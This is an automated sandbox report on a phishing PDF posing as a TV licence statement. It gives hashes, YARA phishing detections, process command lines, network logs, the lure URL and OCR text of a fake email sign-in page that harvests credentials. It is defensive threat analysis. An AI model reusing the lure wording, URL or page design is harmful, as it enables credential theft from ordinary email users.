Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YOUR TV LICENCE STATEMENT.pdf

Overview

General Information

Sample name:YOUR TV LICENCE STATEMENT.pdf
Analysis ID:1585745
MD5:e5e292f0c651baa578e1c1de0caf4144
SHA1:f383e6ef46517b91c18d409ac0bb1a865152d00a
SHA256:83a262e692c5d8fcb98079260c371ab4be8830f6216db4696a9be25d381939a1
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Yara detected HtmlPhish44
Yara detected HtmlPhish7
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
Detected non-DNS traffic on DNS port
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7304 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\YOUR TV LICENCE STATEMENT.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7492 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1580,i,10633171996407317967,11884511674635725987,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1956,i,1734018257759887342,15067520715141933685,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Downloads\Unpaid TV License Statement- Copy.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1944,i,4660417916530889188,3192819211020463480,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\Unpaid TV License Statement- Copy.html.crdownloadJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    dropped/chromecache_288JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      SourceRuleDescriptionAuthorStrings
      1.0.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          1.1.pages.csvJoeSecurity_HtmlPhish_7Yara detected HtmlPhish_7Joe Security
            1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: C:\Users\user\Downloads\Unpaid TV License Statement- Copy.html.crdownload, type: DROPPED
              Source: Yara matchFile source: dropped/chromecache_288, type: DROPPED
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: PDF documentJoe Sandbox AI: Page contains button: 'VIEW HERE/DOWNLOAD HERE YOUR STATEMENT' Source: 'PDF document'
              Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'view here/download here your statement'
              Source: Chrome DOM: 1.1OCR Text: TV Arrears Penalty Statement To read the document please enter with the valid email credentials that this file was sent Sign in with Outlook Sign in with Office365 Sign in with Other Mail Select your email provider to view Document SABC Copyright 0 2025.
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: Title: Share Point Online does not match URL
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: Has password / email / username input fields
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: <input type="password" .../> found
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: No favicon
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: No <meta name="author".. found
              Source: file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlHTTP Parser: No <meta name="copyright".. found
              Source: global trafficTCP traffic: 192.168.2.4:50051 -> 1.1.1.1:53
              Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
              Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
              Source: Joe Sandbox ViewIP Address: 78.46.22.25 78.46.22.25
              Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/ HTTP/1.1Host: ucarecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.16.0/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bootstrap/4.5.2/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.16.0/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bootstrap/4.5.2/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.png HTTP/1.1Host: help.lafayette.eduConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/red-email-mail-logo-png-8.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/gmail-email-logo-png-12.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/03/Bildschirmfoto-2015-03-18-um-16.58.00.png HTTP/1.1Host: publishingblog.chConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/gmail-email-logo-png-12.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/red-email-mail-logo-png-8.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: publishing.blogConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.png HTTP/1.1Host: help.lafayette.eduConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: publishing.blogConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb34-a1b9"If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb34-30d5"If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
              Source: global trafficHTTP traffic detected: GET /uploads/red-email-mail-logo-png-8.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb2b-23834"If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
              Source: global trafficHTTP traffic detected: GET /uploads/gmail-email-logo-png-12.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb2b-71df"If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: publishing.blogConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb34-a1b9"If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
              Source: global trafficHTTP traffic detected: GET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb34-30d5"If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
              Source: global trafficHTTP traffic detected: GET /uploads/gmail-email-logo-png-12.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb2b-71df"If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
              Source: global trafficHTTP traffic detected: GET /uploads/red-email-mail-logo-png-8.png HTTP/1.1Host: www.freepnglogos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "6300eb2b-23834"If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: publishing.blogConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: chromecache_281.10.drString found in binary or memory: <a href="https://publishing.blog/sponsored-posts/" target="_blank" rel="noopener noreferrer">Sponsored Posts:</a><br /><a href="mailto:simea@morntag.com" target="_blank" rel="noopener noreferrer">simea@morntag.com</a></p><p class="textwidget">Der Publishingblog wird betrieben von<br /><a href="https://www.linkedin.com/in/roschu" target="_blank" rel="noopener noreferrer">Roman Schurter</a> und <a href="http://morntag.com" target="_blank" rel="noopener">morntag</a></p><p class="textwidget"><a href="https://publishing.blog/impressum/">Impressum und Datenschutz</a></p></div></div></div></div><div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-3131b1fa" data-id="3131b1fa" data-element_type="column" id="newsletter-wrapper"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-a3b8234 elementor-widget elementor-widget-heading" data-id="a3b8234" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h4 class="elementor-heading-title elementor-size-default">Neue Beitr equals www.linkedin.com (Linkedin)
